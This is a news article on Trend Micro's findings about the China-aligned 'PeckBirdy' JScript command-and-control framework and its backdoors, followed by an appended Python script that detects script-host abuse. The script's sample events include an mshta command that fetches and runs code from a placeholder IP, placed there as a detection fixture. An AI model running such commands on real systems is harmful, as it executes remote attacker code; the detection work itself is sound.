China-Backed 'PeckBirdy' Takes Flight for Cross-Platform Attacks - Dark Reading

Dark Reading, archived May 11, 2026
In two separate campaigns, attackers used the JScript C2 framework to target Chinese gambling websites and Asian government entities with new backdoors.

Elizabeth Montalbano, Contributing Writer
January 28, 2026
(Image: BeeBright via Shutterstock)

China-aligned threat actors have been using a cross-platform, multifunction JScript framework to conduct cyber-espionage attacks for the past several years, augmenting their activities with modular backdoors in two separate campaigns targeting gambling sites and government entities.

Researchers at Trend Micro have been tracking the use of the framework, dubbed "PeckBirdy," since 2023, according to a blog post this week. The command-and-control (C2) framework, written in Microsoft's legacy JScript language, is aimed at flexible deployment by enabling execution across multiple environments.

The use of such a C2 framework gives attackers an advantage against defenders, as "detecting malicious JavaScript frameworks remains a significant challenge due to their use of dynamically generated, runtime-injected code and the absence of persistent file artifacts," Trend Micro threat researchers Ted Lee and Joseph C. Chen wrote in the post. This, in turn, enables them to evade traditional endpoint security controls, they said.

PeckBirdy allows attackers to abuse living-off-the-land (LOTL) binaries (LOLBins) to execute malicious activities across different execution environments rather than being confined to one platform. Attackers also demonstrated the use of two newly discovered modular backdoors — which researchers name "MKDoor" and "HoloDonut" — to bolster the native functionality of PeckBirdy and conduct cyber-espionage, the researchers said.

Two Separate Campaigns Wielding PeckBirdy

Specifically, Trend Micro uncovered two separate campaigns, tracked as Shadow-Void-044 and Shadow-Earth-045, using PeckBirdy across multiple attack vectors, which the researchers believe are the work of different China-aligned actors.

The former campaign, which began in 2023, targeted Chinese gambling websites with malicious scripts and links to remote servers that allow actors to use PeckBirdy to deliver and execute JScript code to visitors of the sites. "The primary goal of this routine is to display fake software update web pages for Google Chrome to entice victims into downloading and executing malicious update files, which are backdoors prepared by the attackers," the researchers wrote. One of the backdoors used in the campaign is MKDoor, a previously undocumented malware.

Attackers in the Shadow-Void campaign also used stolen code-signing certificates, Cobalt Strike payloads, and exploits — including a Google Chrome RCE flaw tracked as CVE-2020-16040 — hosted across multiple C2 domains and IP addresses to maintain persistent access.

Link to China's Earth Baxia?

The Shadow-Earth campaign, discovered in July 2024, targeted Asian government entities by injecting PeckBirdy links into government websites to deliver scripts for credential harvesting.

"In one case, the injection was on a login page of a government's system, while in another incident, we noticed the attacker using MSHTA to execute PeckBirdy as a remote access channel for lateral movement in a private organization," the researchers wrote.

This activity, which targeted a Philippine educational institution in July 2024, also downloaded files from an IP address previously linked to Chinese threat actor Earth Baxia, though evidence supporting the group's involvement is weak for now, according to Trend Micro.

The Shadow-Earth attackers wielded the previously identified GrayRabbit backdoor as well as the HoloDonut backdoor in their activities. GrayRabbit has been used by a threat group tracked as China-backed UNC3569, while HoloDonut had not been detected before but is likely linked to another backdoor, WizardNet, used by an APT similarly named TheWizard, the researchers noted.

The threat actor behind the government attacks also developed a .NET executable to launch PeckBirdy with ScriptControl, further demonstrating "the versatility of PeckBirdy's design, which enables it to serve multiple purposes," they wrote.

Defensive Monitoring Necessary

It's unclear which threat actors are using PeckBirdy in these campaigns, but Trend Micro says they are likely aligned with Chinese state-sponsored threat activity, in which numerous APTs are consistently conducting cyber-espionage activities against select targets across the globe.

In such a threat environment, "adaptability and continuous refinement of defensive strategies are no longer optional, but fundamental to maintaining operational integrity" as defenders continue to ward off persistent hostile threats, the researchers noted.
One tactic integral to organizations' defense plans should be continuous monitoring of infrastructure so they can block any intrusive activities before attackers can gain a persistent foothold.

To that end, Trend Micro included links to previous reports about the potential threat actors behind the campaign so defenders can educate themselves on their tools, tactics, and procedures (TTPs), as well as hunting queries and indicators of compromise (IOCs) that organizations can employ in their security activities to detect potential use of PeckBirdy.
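As an added illustration of the continuous monitoring the researchers call for (example code written for this page, not Trend Micro's hunting queries or IOCs): a small rule set over constructed process-creation events that flags Windows script hosts such as mshta.exe when they are launched with remote or inline content, or spawned by a browser or Office application. The process names, parent list and sample events are assumptions chosen to match the MSHTA and LOLBin abuse the article describes.

```python
"""Flag LOLBin-style script-host launches in process-creation telemetry."""
import re
from typing import Dict, List, Tuple

# Windows script hosts commonly abused as LOLBins (assumption, not from the article).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents from which an interactive script host is rarely legitimate (heuristic).
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}
# Remote content (http(s) URL, UNC path) or inline script protocol handlers.
REMOTE_OR_INLINE = re.compile(r"(https?://|\\\\[^\s\\]+\\|javascript:|vbscript:)", re.I)

# Constructed sample events; the IP is a documentation address, not an indicator.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Desktop\report.hta"'},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/update/loader"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe javascript:window.close()"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli"},
]


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list means clean)."""
    hits: List[str] = []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return hits
    if REMOTE_OR_INLINE.search(event["cmdline"]):
        hits.append("script_host_remote_or_inline_content")
    if basename(event["parent"]) in SUSPICIOUS_PARENTS:
        hits.append("script_host_spawned_by_browser_or_office")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every rule hit across a batch of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

A local .hta opened from Explorer and a service-driven cscript run stay clean, which is the tuning point: the rules key on where the script host gets its code and who launched it, not on the binary alone.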